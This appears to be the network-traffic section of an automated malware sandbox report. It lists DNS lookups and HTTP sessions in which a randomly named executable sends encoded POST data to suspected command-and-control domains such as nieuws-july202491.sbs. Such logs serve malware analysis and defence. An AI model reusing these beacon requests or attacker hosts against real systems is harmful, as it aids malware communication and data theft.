                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.734946966 CEST1.1.1.1192.168.2.50x7597No error (0)b1-3-r111.kunlundns.top129.226.56.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.976183891 CEST1.1.1.1192.168.2.50xfc23No error (0)www.nieuws-july202491.sbsnieuws-july202491.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.976183891 CEST1.1.1.1192.168.2.50xfc23No error (0)nieuws-july202491.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.355448008 CEST1.1.1.1192.168.2.50xac32No error (0)www.putizhong.homes154.7.176.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.896651983 CEST1.1.1.1192.168.2.50xcd5aNo error (0)www.coba168.infocoba168.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.896651983 CEST1.1.1.1192.168.2.50xcd5aNo error (0)coba168.info118.139.178.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.481498003 CEST1.1.1.1192.168.2.50xb1d3No error (0)www.everyone.golfeveryone.golfCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.481498003 CEST1.1.1.1192.168.2.50xb1d3No error (0)everyone.golf3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.481498003 CEST1.1.1.1192.168.2.50xb1d3No error (0)everyone.golf15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:44.810873032 CEST1.1.1.1192.168.2.50xf02aNo error (0)www.royapop.online209.74.64.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:58.278000116 CEST1.1.1.1192.168.2.50x465cName error (3)www.jy58gdwf7t.skinnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.556608915 CEST1.1.1.1192.168.2.50x41ceNo error (0)www.b-ambu.comb-ambu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:06.556608915 CEST1.1.1.1192.168.2.50x41ceNo error (0)b-ambu.com84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.198770046 CEST1.1.1.1192.168.2.50x9280No error (0)www.livpure-grab.onlinelivpure-grab.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.198770046 CEST1.1.1.1192.168.2.50x9280No error (0)livpure-grab.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.010365963 CEST1.1.1.1192.168.2.50xdc27No error (0)www.bandukchi.combandukchi.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.010365963 CEST1.1.1.1192.168.2.50xdc27No error (0)bandukchi.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:34.010365963 CEST1.1.1.1192.168.2.50xdc27No error (0)bandukchi.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:48.978600979 CEST1.1.1.1192.168.2.50x286No error (0)www.mcse.top154.9.228.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.338252068 CEST1.1.1.1192.168.2.50xcc55No error (0)www.voidzero.techvoidzero.techCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.338252068 CEST1.1.1.1192.168.2.50xcc55No error (0)voidzero.tech84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.039882898 CEST1.1.1.1192.168.2.50x7ba9No error (0)www.huwin.clubhuwin.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.039882898 CEST1.1.1.1192.168.2.50x7ba9No error (0)huwin.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.039882898 CEST1.1.1.1192.168.2.50x7ba9No error (0)huwin.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.629791021 CEST1.1.1.1192.168.2.50x3339No error (0)www.xueerr.xyz129.226.176.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.466593981 CEST1.1.1.1192.168.2.50x25cfNo error (0)www.onlineblikje.online213.249.67.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.128691912 CEST1.1.1.1192.168.2.50x698aNo error (0)www.rtpsilva4d.clickrtpsilva4d.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:58.128691912 CEST1.1.1.1192.168.2.50x698aNo error (0)rtpsilva4d.click67.223.117.169A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • www.dxfwrc2h.sbs
                                                                                                                                                                                                                                              • www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              • www.putizhong.homes
                                                                                                                                                                                                                                              • www.coba168.info
                                                                                                                                                                                                                                              • www.everyone.golf
                                                                                                                                                                                                                                              • www.royapop.online
                                                                                                                                                                                                                                              • www.b-ambu.com
                                                                                                                                                                                                                                              • www.livpure-grab.online
                                                                                                                                                                                                                                              • www.bandukchi.com
                                                                                                                                                                                                                                              • www.mcse.top
                                                                                                                                                                                                                                              • www.voidzero.tech
                                                                                                                                                                                                                                              • www.huwin.club
                                                                                                                                                                                                                                              • www.xueerr.xyz
                                                                                                                                                                                                                                              • www.onlineblikje.online
                                                                                                                                                                                                                                              • www.rtpsilva4d.click

                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.549787129.226.56.200802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:33.753350019 CEST482OUTGET /28kl/?7Bohe=ZkKAB6qSK6F5HsjBEzwiMizWOSJwTbSi5er0Koahj7mpnIIYqRoLKzbDk71u2k+MO6tmUyIoyOO9F/o0RCIBFZEb81/8BfbGrnNiAiZNS4xvfhhZvRECGHuLoGBIxYjXhw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.dxfwrc2h.sbs
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:34.701767921 CEST306INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Server: Tengine
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:17:34 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.549866162.0.215.33802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:49.999325991 CEST767OUTPOST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 79 39 6d 78 6a 43 53 35 45 34 4f 66 70 47 75 57 68 57 67 48 45 4b 2f 32 4a 6e 43 58 39 39 4f 36 30 4b 2f 57 35 49 43 57 46 4f 6f 4f 44 6a 68 66 62 58 35 59 62 76 4c 4a 4c 4b 44 6e 32 7a 75 4f 46 54 71 5a 69 69 32 51 61 6d 43 65 38 37 79 50 54 68 76 39 4b 79 6b 6a 78 74 45 69 34 2b 78 46 31 66 64 5a 5a 4e 31 68 78 76 55 61 79 46 50 55 70 69 6e 76 44 2f 59 73 74 45 74 4d 4c 77 58 46 75 4b 64 63 4e 54 54 67 4f 71 4e 68 76 47 74 52 6d 6a 62 73 69 62 31 31 73 4e 57 35 58 57 75 5a 77 72 32 49 39 61 61 48 69 66 58 73 30 51 77 55 57 74 36 55 64 39 6a 39 61 4d 63 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyy9mxjCS5E4OfpGuWhWgHEK/2JnCX99O60K/W5ICWFOoODjhfbX5YbvLJLKDn2zuOFTqZii2QamCe87yPThv9KykjxtEi4+xF1fdZZN1hxvUayFPUpinvD/YstEtMLwXFuKdcNTTgOqNhvGtRmjbsib11sNW5XWuZwr2I9aaHifXs0QwUWt6Ud9j9aMc=
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:50.661396980 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:50 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 1352ZJvLRMUhqCV's=pB<w?qKvm( o=|3q+{XV)w]vtOv,"fv?B0GV]nyyG=56jZ:UMh/0K'wRUX7!rV&Y:s*^o/^VL?{f]m7n*/L-B/?.+0@{?{T`+1J`YiG~LgK{?uMSap;kWa~g[<6.83Fnwzf>v=%ZqM\[My}zze/meeVu7/y6AVYfN"{fWiKK=0}+nf <|#5uWi~?ulriocWRrd~"+7)o|Gp++S'@[YUeM^_WXBGWxGV^5^Y}q+|g|qW&0zDP7q#C6=-L/1euI+=SwU`^Wo-/z#.6F-H~%Y}i,O9 A%?ZYIZufsoD G8~OI{tmH75>Z#P:{}>Lnn!AOl^:?Ww'
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:50.661420107 CEST1236INData Raw: 4a e0 6f 66 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 08 a4 2f 86 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 95 97 67 e5 25 43 3d 0c 0a 37 06 b1 ae b9 71 c0 7e 4e 1f b1 80 ff b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7e ba 20 fb d9 af df cf 7b 63 bf 5f 71 cb
                                                                                                                                                                                                                                              Data Ascii: JofxoO/6g%C=7q~N t7}cU~ {c_qY+~7/CQOEK{?zvGY?U)g:$?*d4^}oa'CFXx!g9iY\W8a*~+z`U$
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:50.661431074 CEST1236INData Raw: b8 2c 71 6a 01 8b 46 1b 2e 3b 4d f0 5d 7e 6e 27 96 24 52 b6 2d 68 ac d3 e9 ae 61 a6 93 5c 9d 49 8c ce 89 93 ae 45 ed 60 16 32 74 96 44 67 bc 23 f0 18 4a eb ed 34 d9 06 91 5a 22 e6 c8 18 1b c2 c6 1d 8f b1 04 ad f6 b1 ce f0 c1 5c a4 a2 51 5a 2f 78
                                                                                                                                                                                                                                              Data Ascii: ,qjF.;M]~n'$R-ha\IE`2tDg#J4Z"\QZ/x:7+Ne4]f&cK}6<;U?Zse,}\]lZ|t: G;n8cni5HOp,s)jf(6rfZ&;pFM=:rRy%;iJ^nCeST jF
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:50.661442041 CEST1236INData Raw: 0d 01 9c 5a 61 9a f6 7c 5c c6 f5 ba 09 38 66 c3 60 26 21 9e 3a 98 d0 bb 45 d1 91 7e 76 b2 b7 88 ce fb 4b e2 84 2d 70 01 d2 e3 e1 4e 84 89 26 b3 47 c5 3e a2 71 26 6f f0 f4 e0 ad e0 34 d0 c6 24 0a 42 b3 3c aa 88 a5 bb ed d4 ae 8e 52 bf 9e a1 2b 92
                                                                                                                                                                                                                                              Data Ascii: Za|\8f`&!:E~vK-pN&G>q&o4$B<R+5ZX%&;ZbKfi~vcgY#[Lwl"'y<6B.<lz8,~D24wh*-s38&+/vBy@NL6)i\#[:-nI\
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:50.661453962 CEST294INData Raw: 47 04 ef 63 9e 9d ee ed ca f9 6e 00 ff 84 fc 95 50 d7 97 cc 9f c8 72 cd fe a7 d0 fd 0c 56 7f 7a c1 d5 9f 3f d5 c6 45 e0 f7 b6 bc de f1 79 f8 8f 34 06 d4 f9 4e 09 cf aa ba fb f6 08 7f b6 ea 11 fe c8 3c 37 80 fa 80 af ab 18 f1 ca e2 e3 73 6d ef bd
                                                                                                                                                                                                                                              Data Ascii: GcnPrVz?Ey4N<7sm]?z{ZWeV}N@gIP;$7AKPaW`w$wL|*_bj`2ZweCfovM3pK}AhpM


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.549877162.0.215.33802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:52.541713953 CEST787OUTPOST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 7a 64 32 78 67 6a 53 35 55 6f 4f 59 30 32 75 57 34 6d 68 4f 45 4b 7a 32 4a 6e 71 48 38 50 71 36 30 76 44 57 2b 4c 61 57 47 4f 6f 4f 4c 44 67 58 52 33 35 44 62 76 48 6e 4c 4b 2f 6e 32 79 4f 4f 46 53 61 5a 6a 52 75 54 61 32 43 63 31 62 79 4e 5a 42 76 39 4b 79 6b 6a 78 74 34 45 34 36 56 46 31 75 74 5a 59 73 31 69 76 2f 55 56 78 46 50 55 69 43 6e 72 44 2f 59 4f 74 46 68 6d 4c 32 62 46 75 4b 74 63 4b 43 54 6a 48 71 4d 4c 79 57 73 53 74 53 79 4f 34 61 5a 6c 74 50 66 4b 4c 41 32 74 78 64 62 69 6e 34 53 76 78 2f 37 55 6b 44 34 6a 48 64 62 39 48 65 7a 4e 45 62 4c 78 39 78 45 48 4b 67 41 6d 4c 49 42 2f 73 47 4b 73 67 66 4c 4d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=b40V17h4HrXyzd2xgjS5UoOY02uW4mhOEKz2JnqH8Pq60vDW+LaWGOoOLDgXR35DbvHnLK/n2yOOFSaZjRuTa2Cc1byNZBv9Kykjxt4E46VF1utZYs1iv/UVxFPUiCnrD/YOtFhmL2bFuKtcKCTjHqMLyWsStSyO4aZltPfKLA2txdbin4Svx/7UkD4jHdb9HezNEbLx9xEHKgAmLIB/sGKsgfLM
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:53.204755068 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                              date: Thu, 24 Oct 2024 13:17:53 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 52 4d 55 cf 68 03 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 4b 76 6d 28 fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 5d 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 135CZJvLRMUhqCV's=pB<w?qKvm( o=|3q+{XV)w]vtOv,"fv?B0GV]nyyG=56jZ:UMh/0K'wRUX7!rV&Y:s*^o/^VL?{f]m7n*/L-B/?.+0@{?{T`+1J`YiG~LgK{?uMSap;kWa~g[<6.83Fnwzf>v=%ZqM\[My}zze/meeVu7/y6AVYfN"{fWiKK=0}+nf <|#5uWi~?ulriocWRrd~"+7)o|Gp++S'@[YUeM^_WXBGWxGV^5^Y}q+|g|qW&0zDP7q#C6=-L/1euI+=SwU`^Wo-/z#.6F-H~%Y}i,O9 A%?ZYIZufsoD G8~OI{tmH75>Z#P:{}>Lnn!AOl^:?Ww'
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:53.204783916 CEST1236INData Raw: 4a e0 6f 66 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 08 a4 2f 86 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 95 97 67 e5 25 43 3d 0c 0a 37 06 b1 ae b9 71 c0 7e 4e 1f b1 80 ff b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7e ba 20 fb d9 af df cf 7b 63 bf 5f 71 cb
                                                                                                                                                                                                                                              Data Ascii: JofxoO/6g%C=7q~N t7}cU~ {c_qY+~7/CQOEK{?zvGY?U)g:$?*d4^}oa'CFXx!g9iY\W8a*~+z`U$
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:53.204799891 CEST424INData Raw: b8 2c 71 6a 01 8b 46 1b 2e 3b 4d f0 5d 7e 6e 27 96 24 52 b6 2d 68 ac d3 e9 ae 61 a6 93 5c 9d 49 8c ce 89 93 ae 45 ed 60 16 32 74 96 44 67 bc 23 f0 18 4a eb ed 34 d9 06 91 5a 22 e6 c8 18 1b c2 c6 1d 8f b1 04 ad f6 b1 ce f0 c1 5c a4 a2 51 5a 2f 78
                                                                                                                                                                                                                                              Data Ascii: ,qjF.;M]~n'$R-ha\IE`2tDg#J4Z"\QZ/x:7+Ne4]f&cK}6<;U?Zse,}\]lZ|t: G;n8cni5HOp,s)jf(6rfZ&;pFM=:rRy%;iJ^nCeST jF
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:53.204813004 CEST1236INData Raw: ea e7 98 5d 4a a7 90 da 43 8b 1d c8 36 ab 61 78 2c 44 42 4d 6b 39 f6 c8 6c c3 5b 73 92 1e 0e 47 aa 3a 47 16 72 b1 3e 60 55 b8 f5 ec 49 1a 20 81 22 e6 06 bf 99 1e 12 86 76 31 8b 1a ea 78 2b 75 61 16 f2 85 96 60 69 1d 38 a4 aa b1 34 29 b6 6b 8d de
                                                                                                                                                                                                                                              Data Ascii: ]JC6ax,DBMk9l[sG:Gr>`UI "v1x+ua`i84)kBV*'Ig9v.&$5Ql1rMRNs^-Tu+^9lZ9]e9:h+q8& Brh%v>qaa;u
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:53.204828978 CEST1101INData Raw: ad bb 22 c9 dd 78 37 0a 76 1a c7 69 67 a7 15 f6 f0 90 c3 82 c3 01 14 fd 70 c9 1a 9e 50 59 94 8f 90 e5 ee 41 c2 74 48 62 34 1c b7 8a e1 c9 64 be 67 6c c4 87 66 f3 70 6e 84 72 41 15 44 83 ee 8b c6 b1 2a f3 9c a3 a3 f5 8a 5d 7a fb 3c 97 c2 29 37 0a
                                                                                                                                                                                                                                              Data Ascii: "x7vigpPYAtHb4dglfpnrAD*]z<)77&=d&-Q;k8C,v)uEMUz?Sjl?ea0@s^)TY^?gtm(@a1D6#6u@7Vk{i<vTIdlbk$


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.549893162.0.215.33802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:55.094186068 CEST1804OUTPOST /4bpc/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Origin: http://www.nieuws-july202491.sbs
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.nieuws-july202491.sbs/4bpc/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 34 30 56 31 37 68 34 48 72 58 79 7a 64 32 78 67 6a 53 35 55 6f 4f 59 30 32 75 57 34 6d 68 4f 45 4b 7a 32 4a 6e 71 48 38 50 69 36 30 39 37 57 2b 71 61 57 48 4f 6f 4f 49 44 67 57 52 33 34 62 62 73 33 6a 4c 4b 7a 33 32 32 2b 4f 46 77 53 5a 6b 67 75 54 51 32 43 63 71 4c 79 4d 54 68 75 6e 4b 30 45 6e 78 73 45 45 34 36 56 46 31 74 46 5a 49 4e 31 69 74 2f 55 61 79 46 4f 47 70 69 6e 50 44 2f 41 30 74 46 6c 63 4c 6d 37 46 75 75 4a 63 4c 30 76 6a 49 71 4e 74 68 6d 73 77 74 53 75 34 34 61 46 70 74 4f 62 67 4c 48 61 74 7a 4a 71 45 32 4d 54 30 6e 35 6a 46 32 45 6b 37 48 49 62 39 4b 50 58 57 4e 4a 33 75 68 79 59 38 49 51 41 47 4e 34 42 37 7a 33 50 38 68 5a 33 46 35 31 5a 4b 4d 34 4a 47 66 59 48 2f 6f 79 4c 48 54 31 32 39 35 50 2b 57 32 64 6a 32 58 5a 54 45 43 6a 7a 48 6a 79 55 6a 54 33 70 54 57 44 77 46 68 77 6b 39 64 5a 62 36 72 33 68 41 55 42 53 55 37 4c 6c 70 44 41 56 76 41 62 71 4f 30 6f 6e 37 54 74 58 75 62 79 33 49 55 51 78 6d 51 6e 75 49 39 6d 77 75 48 55 75 4d 4b 30 71 2b 78 71 51 44 [TRUNCATED]
